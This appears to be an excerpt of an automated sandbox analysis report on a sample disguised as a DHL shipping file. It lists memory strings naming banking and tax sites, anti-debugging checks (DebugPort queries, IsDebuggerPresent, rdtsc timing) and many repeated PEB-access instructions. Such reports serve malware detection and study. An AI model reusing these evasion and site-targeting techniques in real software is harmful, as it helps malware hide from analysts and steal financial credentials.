            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AEAA2 BlockInput,0_2_000AEAA2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00054CE8 mov eax, dword ptr fs:[00000030h]0_2_00054CE8
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0117A7B0 mov eax, dword ptr fs:[00000030h]0_2_0117A7B0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0117BDE0 mov eax, dword ptr fs:[00000030h]0_2_0117BDE0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0117BE40 mov eax, dword ptr fs:[00000030h]0_2_0117BE40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
